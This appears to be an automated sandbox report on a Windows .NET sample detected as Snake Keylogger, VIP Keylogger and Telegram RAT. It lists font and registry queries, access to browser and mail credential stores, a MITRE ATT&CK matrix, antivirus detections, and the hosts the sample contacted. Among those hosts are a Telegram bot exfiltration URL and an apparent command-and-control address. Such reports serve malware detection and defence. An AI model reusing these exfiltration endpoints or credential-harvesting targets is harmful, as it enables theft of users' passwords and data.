                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		111
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		21
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		3
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                System Network Configuration Discovery                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Obfuscated Files or Information                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe42%VirustotalBrowse
                file.exe42%ReversingLabsByteCode-MSIL.Trojan.Generic
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		188.114.96.3
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		193.122.6.168
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          http://checkip.dyndns.org/false
                            		high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2031/12/2024%20/%2020:54:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.fontbureau.com/designersGfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bThefile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.orgfile.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.org/botfile.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers?file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.office.com/lBfile.exe, 00000002.00000002.4144889269.000000000327F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.tiro.comfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designersfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000002.00000002.4148149933.0000000004316000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004364000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.goodfont.co.krfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://chrome.google.com/webstore?hl=enfile.exe, 00000002.00000002.4144889269.0000000003253000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://varders.kozow.com:8081file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
